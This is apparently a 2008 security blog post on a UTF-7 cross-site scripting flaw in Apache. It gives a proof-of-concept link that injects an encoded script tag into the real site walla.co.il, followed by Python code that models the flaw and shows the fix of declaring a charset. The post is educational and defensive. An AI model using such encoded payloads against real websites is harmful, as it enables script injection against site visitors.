Tuesday, July 8, 2008

XSS UTF-7

Lament (my best student so far...) discovered a new XSS vulnerability in the Apache server (two months ago, and still unfixed). Read about Cross-site Scripting here.

This vulnerability shows that we can't blindly TRUST a link just because it points at a known domain name. In the following POC we can see that walla.co.il is vulnerable, just like all the other websites running the Apache server.

POC

Open a new Internet Explorer window and paste the following link:

http://www.walla.co.il/Znl5g3k70ZaBUPYmN5RAGUdkskoprzGI63K4mIj2sqzbX0Kc3Fu7vfthepWhmKvjudPuJTNeK9zw5MaZ1yXJi8RJRRuPe5UahFwOblMXsIPTGh3pVjTLdim3vuTKgdazOG9idQbIjbnpMEco8Zlo5xNRuCoviPx7x7tYYeOgc8HU46gaecJwnHY7f6GlQB8H6kBFhjoIaHE1SQPhU5VReCz1olPh5jZ%3Cfont%20size=50%3EDEFACED%3C!xc+ADw-script+AD4-alert('I XSSedYOU!!!')+ADw-/script+AD4---//--

Next, right-click on the page and change the encoding to Auto-Select. BOOM. A message box should open now.
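The mechanism behind the "change encoding" step is that the page is reflected without a declared charset, so the browser's auto-detection is free to read the `+ADw-` / `+AD4-` sequences as UTF-7, where they mean `<` and `>`. A `<`-and-`>` filter never sees those characters, which is why the payload gets through. The following Python script is an added example (not code from the post, and not the walla.co.il page) that models this end to end: a constructed vulnerable reflector, a constructed browser model that mimics auto-select, the same reflector with the charset pinned, and an input-side check that flags values which become markup under UTF-7. Note that Python's built-in `utf-7` codec sends `<` and `>` directly (they are RFC 2152 Set O characters), so the block hand-rolls the shift sequences to reproduce the form seen in the POC.

```python
import base64
import html
import re

# RFC 2152 "Set D": characters UTF-7 always sends directly. Everything else
# (including < and >) is sent here as a "+<base64 of UTF-16BE>-" shift
# sequence, which is the form the post's payload uses.
SET_D = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
            "0123456789'(),-./:?")

# A UTF-7 shift sequence: '+', base64 characters, closing '-'.
SHIFT_RE = re.compile(rb"\+[A-Za-z0-9+/]+-")


def utf7_shift(ch: str) -> str:
    """Return the UTF-7 shift sequence for one BMP character."""
    b64 = base64.b64encode(ch.encode("utf-16-be")).decode("ascii").rstrip("=")
    return "+" + b64 + "-"


def utf7_encode_markup(text: str) -> bytes:
    """Encode text as UTF-7, shifting every character outside Set D.

    Python's own 'utf-7' codec would emit < and > directly; this encoder
    produces the +ADw- / +AD4- forms instead.
    """
    return "".join(ch if ch in SET_D else utf7_shift(ch) for ch in text).encode("ascii")


def naive_reflect(param: str) -> tuple:
    """Constructed vulnerable page builder: HTML-escapes the parameter but
    declares no charset, so the browser is free to guess one."""
    body = "<html><body>Not found: " + html.escape(param) + "</body></html>"
    return {"Content-Type": "text/html"}, body.encode("ascii")


def safe_reflect(param: str) -> tuple:
    """Constructed hardened page builder: same escaping, but the charset is
    pinned in both the HTTP header and a <meta charset> tag."""
    body = ('<!DOCTYPE html><html><head><meta charset="utf-8"></head>'
            "<body>Not found: " + html.escape(param) + "</body></html>")
    return {"Content-Type": "text/html; charset=UTF-8"}, body.encode("utf-8")


def browser_render(headers: dict, body: bytes) -> str:
    """Constructed model of a browser's charset handling: honour a declared
    charset; otherwise, like the post's Auto-Select step, treat a pure-ASCII
    body containing shift sequences as UTF-7."""
    m = re.search(r"charset=([\w-]+)", headers.get("Content-Type", ""), re.I)
    if m:
        return body.decode(m.group(1))
    if body.isascii() and SHIFT_RE.search(body):
        return body.decode("utf-7")
    return body.decode("utf-8")


def contains_hidden_markup(value: str) -> bool:
    """Input-side detection: flag a value that is plain ASCII but turns into
    markup when read as UTF-7."""
    try:
        decoded = value.encode("ascii").decode("utf-7")
    except (UnicodeEncodeError, UnicodeDecodeError):
        return False
    return decoded != value and ("<" in decoded or ">" in decoded)


if __name__ == "__main__":
    # Constructed payload: the post's trick with a harmless alert(1).
    payload = utf7_encode_markup("<script>alert(1)</script>").decode("ascii")
    print("payload:", payload)
    print("naive page renders a script tag:",
          "<script>" in browser_render(*naive_reflect(payload)))
    print("hardened page renders a script tag:",
          "<script>" in browser_render(*safe_reflect(payload)))
    print("input check flags it:", contains_hidden_markup(payload))
```

The fix that matters is in `safe_reflect`: an explicit `charset` in the `Content-Type` header (and a matching `<meta charset>` for pages saved locally) removes the browser's reason to sniff, so the shift sequences stay literal text. The `contains_hidden_markup` check is a second line of defence for logging and WAF-style rules, not a replacement for output encoding plus a declared charset. Browsers that follow the WHATWG Encoding Standard no longer support UTF-7 at all, but the same lesson applies to any charset the server leaves for the client to guess.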

Conclusion: if you receive a long, encoded link, just don't open it. BE AWARE.
